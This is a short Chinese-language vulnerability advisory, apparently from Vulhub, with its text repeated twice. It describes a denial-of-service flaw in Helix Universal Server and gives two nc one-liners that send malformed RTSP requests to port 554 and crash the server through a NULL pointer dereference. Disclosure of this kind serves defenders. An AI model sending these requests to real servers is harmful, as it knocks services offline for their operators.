VULHUB ™

Helix Universal Server是一款由RealNetWorks开发和维护的多类型媒体服务器。 Helix Universal Server不正确处理畸形RTSP请求，远程攻击者可以利用这个漏洞对服务器进行拒绝服务攻击。 问题是Helix Universal Server不正确处理特殊构建的GET请求，下面的请求可导致NULL指针废弃而引起应用程序崩溃： $ echo -e \"GET_PARAMETER / RTSP/1.0＼n＼n\" | nc -v localhost 554 $ echo -e \"DESCRIBE / RTSP/1.0＼nSession：＼n＼n\" | nc -v localhost 554 如果服务器以特殊选项如\'\'--no-crash-avoidance\'\'或\'\'--no-auto-restart\'\'启动，服务器就会变的不可访问。

Helix Universal Server是一款由RealNetWorks开发和维护的多类型媒体服务器。 Helix Universal Server不正确处理畸形RTSP请求，远程攻击者可以利用这个漏洞对服务器进行拒绝服务攻击。 问题是Helix Universal Server不正确处理特殊构建的GET请求，下面的请求可导致NULL指针废弃而引起应用程序崩溃： $ echo -e \"GET_PARAMETER / RTSP/1.0＼n＼n\" | nc -v localhost 554 $ echo -e \"DESCRIBE / RTSP/1.0＼nSession：＼n＼n\" | nc -v localhost 554 如果服务器以特殊选项如\'\'--no-crash-avoidance\'\'或\'\'--no-auto-restart\'\'启动，服务器就会变的不可访问。